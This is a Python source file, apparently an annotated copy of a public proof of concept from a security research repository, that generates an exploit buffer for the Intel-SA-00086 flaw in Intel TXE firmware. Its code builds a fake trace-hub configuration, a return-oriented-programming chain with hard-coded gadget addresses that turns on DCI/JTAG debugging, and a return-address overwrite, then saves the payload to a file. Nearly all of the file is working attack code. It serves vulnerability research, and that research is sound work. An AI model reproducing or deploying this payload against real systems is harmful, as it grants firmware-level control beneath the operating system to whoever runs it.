IntelTXE-PoC/me_exp_bxtp.py at master · ptresearch/IntelTXE-PoC · GitHub
source link: https://github.com/ptresearch/IntelTXE-PoC/blob/master/me_exp_bxtp.py
#!/usr/bin/env python # JTAG activator for Intel ME core via Intel-SA-00086 by Mark Ermolov (@_markel___) # Maxim Goryachy (@h0t_max) # # Details: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00086.html # http://blog.ptsecurity.com/2018/01/running-unsigned-code-in-intel-me.html # https://github.com/ptresearch/IntelME-JTAG
from __future__ import print_function import argparse import struct
# Banner printed by main() and used as the argparse description.
descr = "Intel-SA-00086 JTAG-PoC for TXE (ver. 3.0.1.1107)"

# Layout parameters consumed by GenerateShellCode().  They are byte offsets
# and addresses; presumably specific to the firmware version named in the
# banner (not verifiable from this file).
STACK_BASE = 0x00056000            # base for the return-address word and the tail's last field
SYSLIB_CTX_OFFSET = 0x10           # not referenced by any function in this file
STACK_OFFSET = 0x14                # not referenced by any function in this file
BUFFER_OFFSET = 0x380              # total length of the buffer GenerateShellCode() returns
SYS_TRACER_CTX_OFFSET = 0x200      # subtracted from SYS_TRACER_CTX_REQ_OFFSET -> syslib_ctx_start
SYS_TRACER_CTX_REQ_OFFSET = 0x55c58
RET_ADDR_OFFSET = 0x338            # buffer offset at which the 0x00016e1a word is placed
def GenerateTHConfig():
    """Build the fake trace-hub configuration blob.

    Layout (little-endian): six zero bytes, one 16-bit word (0x2), then four
    32-bit words.  Returns the 24-byte string.  Prints a progress line first,
    like the other generators in this script.
    """
    print("[*] Generating fake tracehub configuration...")
    # "6x" emits the six leading zero bytes in the same pack call; the "<"
    # prefix disables alignment padding so the layout is exactly 6+2+16 bytes.
    return struct.pack(
        "<6xHLLLL",
        0x2,
        0x020000e0,
        0x5f000000,
        0x02000010,
        0x00000888,
    )
def GenerateRops():
    """Build the ROP chain as a string of little-endian 32-bit words.

    Every ``struct.pack("<L", ...)`` appends one 4-byte word; ``*N`` repeats
    a word N times.  The group comments on the first part are the original
    author's; the words after "setting personality" carry no comments in the
    original and are left unannotated here.  Returns the concatenation
    (43 words, 172 bytes).  Prints a progress line first.
    """
    print("[*] Generating rops...")
    #mapping DCI
    rops = struct.pack("<L", 0x0004a76c)  #side-band mapping
    rops += struct.pack("<L", 0x0004a877)  #pop 2 arguments
    rops += struct.pack("<L", 0x000706a8)  #param 2
    rops += struct.pack("<L", 0x00000100)  #param 1
    #activating DCI
    rops += struct.pack("<L", 0x000011BE)  #put_sel_word
    rops += struct.pack("<L", 0x0004a876)  #pop 3 arguments
    rops += struct.pack("<L", 0x0000019f)  #param 3
    rops += struct.pack("<L", 0x00000000)  #param 2
    rops += struct.pack("<L", 0x00001010)  #param 1
    #activating DfX-agg
    rops += struct.pack("<L", 0x0004a76c)  #side-band mapping
    rops += struct.pack("<L", 0x0004a877)  #pop 2 arguments
    rops += struct.pack("<L", 0x00070684)  #param 2
    rops += struct.pack("<L", 0x00000100)  #param 1
    #setting personality
    rops += struct.pack("<L", 0x000011BE)  #put_sel_word
    rops += struct.pack("<L", 0x0004a876)  #pop 3 arguments
    rops += struct.pack("<L", 0x0000019f)  #param 3
    rops += struct.pack("<L", 0x00008400)  #param 2
    rops += struct.pack("<L", 0x00000003)  #param 1
    # Remaining words: no comments in the original source.
    rops += struct.pack("<L", 0x0003d25b)
    rops += struct.pack("<L", 0x00055ff0)
    rops += struct.pack("<L", 0x00099010)
    rops += struct.pack("<L", 0x00000000)*4
    rops += struct.pack("<L", 0x00009dcc)
    rops += struct.pack("<L", 0x00000000)*3
    rops += struct.pack("<L", 0x0003d25d)
    rops += struct.pack("<L", 0x00000000)
    rops += struct.pack("<L", 0x00000001)
    rops += struct.pack("<L", 0x00050004)
    rops += struct.pack("<L", 0x00055d34)
    rops += struct.pack("<L", 0x00035674)
    rops += struct.pack("<L", 0x00000000)*4
    rops += struct.pack("<L", 0x00055d3c)
    rops += struct.pack("<L", 0x00035015)
    rops += struct.pack("<L", 0x00000000)
    rops += struct.pack("<L", 0x000260A1)
    return rops
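def _pad_to(data, size):
    """Return *data* zero-padded to exactly *size* bytes.

    Raises ValueError when *data* is already longer than *size*.  The
    original computed ``struct.pack("<B", 0)*(size - len(data))``, which for
    a negative count silently yields an empty string and leaves every later
    field at the wrong offset.
    """
    if len(data) > size:
        raise ValueError(
            "payload of %d bytes exceeds the %d-byte slot" % (len(data), size)
        )
    return data + struct.pack("<B", 0x0)*(size - len(data))


def GenerateShellCode():
    """Assemble the BUFFER_OFFSET-byte buffer that main() writes to disk.

    Order of the contents:
      1. the blob from GenerateTHConfig() (its length is kept as
         init_trace_len);
      2. the words from GenerateRops();
      3. zero padding up to RET_ADDR_OFFSET, then the word 0x00016e1a and
         the word STACK_BASE - BUFFER_OFFSET + init_trace_len;
      4. zero padding so that the five-word tail ends at BUFFER_OFFSET;
      5. the tail: 0, syslib_ctx_start, 0, 0x03000300, STACK_BASE - 4.

    Returns the buffer, exactly BUFFER_OFFSET bytes long.  Raises ValueError
    if either padded region would overflow its slot.  Prints a progress line.
    """
    syslib_ctx_start = SYS_TRACER_CTX_REQ_OFFSET - SYS_TRACER_CTX_OFFSET
    print("[*] Generating SYSLIB_CTX struct (stack base: %x: syslib ctx base: %x)..." % (STACK_BASE, syslib_ctx_start))
    data = GenerateTHConfig()
    init_trace_len = len(data)
    data += GenerateRops()
    # Pad to the return-address slot, then the two words that follow it.
    data = _pad_to(data, RET_ADDR_OFFSET)
    data += struct.pack("<L", 0x00016e1a)
    data += struct.pack("<L", STACK_BASE - BUFFER_OFFSET + init_trace_len)
    data_tail = struct.pack("<LLLLL", 0, syslib_ctx_start, 0, 0x03000300, STACK_BASE-4)
    # Pad so that appending the tail lands exactly on BUFFER_OFFSET bytes.
    data = _pad_to(data, BUFFER_OFFSET - len(data_tail))
    data += data_tail
    return data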
def ParseArguments():
    """Parse the command line and return the output file name.

    The only option is ``-f <file name>`` (default ``ct.bin``).  The
    module-level ``descr`` banner serves as the parser description.
    """
    parser = argparse.ArgumentParser(description=descr)
    parser.add_argument('-f', metavar='<file name>', help='file name', type=str, default="ct.bin")
    args = parser.parse_args()
    return args.f
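def main():
    """Print the banner, build the buffer and write it to the file named by -f."""
    print(descr)
    file_name = ParseArguments()
    data = GenerateShellCode()
    print("[*] Saving to %s..." % (file_name))
    # The original wrote ``f.close`` without parentheses, which only
    # references the method and never closes the file; the with-block
    # guarantees the handle is flushed and closed even if write() raises.
    with open(file_name, "wb") as f:
        f.write(data)


if __name__=="__main__":
    main()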